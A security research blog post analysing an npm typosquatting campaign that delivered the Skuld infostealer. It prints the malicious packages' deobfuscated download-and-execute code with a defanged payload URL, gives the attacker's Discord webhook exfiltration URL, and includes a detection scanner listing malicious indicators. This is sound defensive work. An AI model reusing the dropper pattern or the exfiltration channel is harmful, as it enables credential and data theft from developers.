Kirill Boychenko
December 18, 2024
Socket’s threat research team identified a malware campaign infiltrating the npm ecosystem, deploying the Skuld infostealer just weeks after a similar attack targeted Roblox developers. The threat actor, identified as “k303903” on the npm registry, disguised malicious packages (windows-confirm, windows-version-check, downloadsolara, and solara-config) as legitimate tools. Before their removal, these packages compromised hundreds of machines, demonstrating how even low-complexity attacks can rapidly gain traction.
The npm registry’s swift response helped limit the spread and impact of this malicious campaign. However, the persistent nature of such attacks and the reuse of open source malware like the Skuld infostealer highlight that this issue is far from disappearing. By studying these recent incidents, developers and organizations can strengthen their defenses, safeguard credentials, and adopt more vigilant development practices.
December 20 - 31, 2024 update: The threat actors identified as “shegotit2” and "hnfwmmo1" on the npm registry are highly likely the same individual as “k303903”, based on their use of identical or highly similar tactics, techniques, and procedures (TTPs). Furthermore, Datadog Security Labs has confirmed another threat actor, “pressurized”, on the npm registry, who is also highly likely the same threat actor operating under a different account. This conclusion is supported by the consistent use of the same TTPs to infiltrate the npm ecosystem with malware. We have petitioned the npm registry to remove all identified malicious packages that may still be active. Indicators of Compromise (IOCs) associated with all identified aliases are detailed in the dedicated IOC section below.
This latest malicious campaign delivering the Skuld infostealer marks the second time in two months that this malware has targeted npm developers. It closely mirrors a previous attack reported by Socket on November 8, 2024, in which Roblox developers were compromised via npm packages infected with Skuld and Blank Grabber malware. Datadog Security Labs published research on November 22, 2024, that further reinforced the scale and sophistication of the threat. In December 2024 the attack resurfaced, with a threat actor using typosquatting and simple yet effective techniques to compromise development machines and exfiltrate sensitive data.
The return of the Skuld infostealer to npm highlights a recurring pattern: attackers gain a foothold, achieve brief success, and swiftly adapt by reintroducing the threat with new packaging and distribution strategies. The December 2024 campaign exhibits the same familiar hallmarks: obfuscation, typosquatting, deceptive tactics, reliance on commodity malware, and common deployment methods.
Screenshot showcasing Skuld’s ability to steal passwords, cookies, sensitive files, and browsing history from Chromium and Gecko-based browsers.
The following malicious code snippet, deobfuscated, defanged, and annotated with comments, offers insight into the threat actor’s methods.
```javascript
const fs = require("fs-extra");
const path = require("path");
const fetch = require("node-fetch");
const { exec } = require("child_process");

// The payload is dropped next to the package code under an innocuous name.
const exeFilePath = path.join(__dirname, "download.exe");

// Downloads and writes the malicious binary to disk, then executes it.
async function downloadFile(url, dest) {
  const response = await fetch(url);
  if (!response.ok) {
    throw new Error("HTTP error! status: " + response.status);
  }
  const buffer = await response.buffer();
  await fs.writeFile(dest, buffer);
}

async function runExecutable() {
  try {
    // The URL is disguised to appear legitimate, using a Cloudflare-like domain (defanged here).
    await downloadFile("hxxps://alternatives-suits-obtained-bowl.trycloudflare[.]com/page", exeFilePath);
    // Launches the dropped Skuld binary on the developer's machine.
    exec(exeFilePath, (error) => {
      if (error) {
        console.error("Error running the executable: " + error);
      }
    });
  } catch (err) {
    console.error("Download error: " + err);
  }
}

// Runs automatically when the package code is loaded.
runExecutable();
```
The threat actor employed Obfuscator.io, a widely used open source tool, to obfuscate the package code and evade initial detection. The Skuld infostealer payload was hosted on URLs designed to appear legitimate, including a domain impersonating Cloudflare. Upon installation, the malicious package silently fetched and executed the malware under the filename download.exe (SHA256: 27b86c1a24a1c97952397943f7b7ef21ee6859145556fe1b197e89074672bd07).
Socket AI Scanner’s analysis, including contextual details about the malicious package.
The threat actor k303903 employed typosquatting by uploading npm packages that mimicked well-known productivity and web development libraries, including masquerading as Windows-related utilities and Solara — a Python framework for building interactive web applications. By publishing packages that appeared legitimate or closely related to these tools, the threat actor aimed to deceive developers into installing them without thoroughly inspecting the package code.
For data exfiltration, the threat actor used a Discord webhook (hxxps://discord[.]com/api/webhooks/1316651715591667752/GNxf9DlNvCZmJ27gRfOlHCEVgvOG-kYbj6d2h5zaX48DpP41elqDEdBvoK1y4F1gpbbw), enabling data transfers and establishing command and control (C2) operations. The use of widely available, open source tools and services kept operational costs low while maximizing the campaign’s reach. To further deceive developers, the threat actor used legitimate-looking commands and paths to fetch the executable payload from a seemingly trustworthy source and from the legitimate service replit.dev. Although trivial to set up, Discord webhooks are a very common method for data exfiltration, allowing threat actors to blend into legitimate developer communication channels and testing environments.
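The download-and-execute pattern in the snippet above and the exfiltration channels described here can be caught with simple heuristics before a package is installed. The scanner below is an added example, not Socket's code or anything from the campaign: its indicator regexes, weights, threshold and the sample package are constructed assumptions, and the hosts in the sample are placeholders.

```javascript
// Added example: heuristic scanner for the install-time download-and-execute pattern
// and exfiltration channels described in the write-up. Indicators and weights are assumptions.
const INDICATORS = [
  { id: "child_process", re: /require\(["']child_process["']\)/, weight: 2 },
  { id: "remote_fetch", re: /\b(fetch|axios\.get|https?\.get)\s*\(/, weight: 1 },
  { id: "native_binary", re: /\.(exe|dll|bat|cmd|ps1)["']/i, weight: 2 },
  { id: "trycloudflare", re: /trycloudflare\.com/i, weight: 3 },
  { id: "replit_host", re: /replit\.dev/i, weight: 2 },
  { id: "discord_webhook", re: /discord(app)?\.com\/api\/webhooks\//i, weight: 3 },
  { id: "obfuscator_io", re: /\b_0x[0-9a-f]{4,}\b/i, weight: 2 }, // Obfuscator.io-style identifiers
];
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall"]; // run code at `npm install`
const ALERT_THRESHOLD = 5; // constructed: tune against your own package corpus

// Returns the ids of every indicator present in one source file.
function scanSource(source) {
  return INDICATORS.filter((i) => i.re.test(source)).map((i) => i.id);
}

// pkg = { manifest: parsed package.json, files: { "path": "source text" } }.
// Lifecycle hooks are flagged because they let a package execute before any import.
function scanPackage(pkg) {
  const findings = [];
  const scripts = (pkg.manifest && pkg.manifest.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (scripts[hook]) findings.push({ where: `scripts.${hook}`, hits: ["lifecycle_hook"] });
  }
  let score = findings.length ? 2 : 0;
  for (const [file, src] of Object.entries(pkg.files || {})) {
    const hits = scanSource(src);
    if (hits.length === 0) continue;
    findings.push({ where: file, hits });
    score += hits.reduce((s, id) => s + INDICATORS.find((i) => i.id === id).weight, 0);
  }
  return { name: pkg.manifest.name, score, alert: score >= ALERT_THRESHOLD, findings };
}

// Constructed sample that mirrors the defanged snippet above; hosts are placeholders.
const SAMPLE_PACKAGE = {
  manifest: { name: "windows-confirm-lookalike", version: "1.0.0", scripts: { postinstall: "node index.js" } },
  files: {
    "index.js": [
      'const { exec } = require("child_process");',
      'const _0x1a2b3c = "https://placeholder-subdomain.trycloudflare.com/page";',
      'fetch(_0x1a2b3c).then((r) => r.buffer()).then((b) => { require("fs").writeFileSync("download.exe", b); exec("download.exe"); });',
      'fetch("https://discord.com/api/webhooks/000000/PLACEHOLDER", { method: "POST" });',
    ].join("\n"),
  },
};
```

Running `scanPackage(SAMPLE_PACKAGE)` reports the postinstall hook plus six file-level indicators, well over the alert threshold, while a package with no hooks and plain source scores zero.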
The threat actor posing their malicious package as a legitimate library to deceive users.
The malicious packages were downloaded more than 600 times before they were removed. Although the npm registry responded quickly, taking down the initial test package aaaa89852889 within one day and the subsequent, above-mentioned packages within four to five days, the impact on affected users was significant. Credentials, tokens, and other sensitive data were likely stolen, jeopardizing both individual developers and organizational networks. Short-lived campaigns like this can have long-lasting consequences, as compromised credentials may be weaponized well after the malicious packages are removed.
This attack mirrors the November 2024 incident, highlighting a troubling pattern: threat actors are pivoting rapidly, reusing known malware strains, and refining their deception techniques. The continued use of the Skuld infostealer demonstrates how commodity malware can cause devastating damage when distributed through trusted supply chains.
Securing your development environment requires a layered approach. While basic measures like verifying package authorship and relying on trusted repositories are important, using automation and specialized tools is essential to keep up with rapidly evolving threats. Deploying free and real-time supply chain security tools, such as Socket’s free GitHub app, CLI, and browser extension, can intercept malicious code early in the development lifecycle. These tools scan pull requests and installations to block harmful dependencies before they integrate into your environment.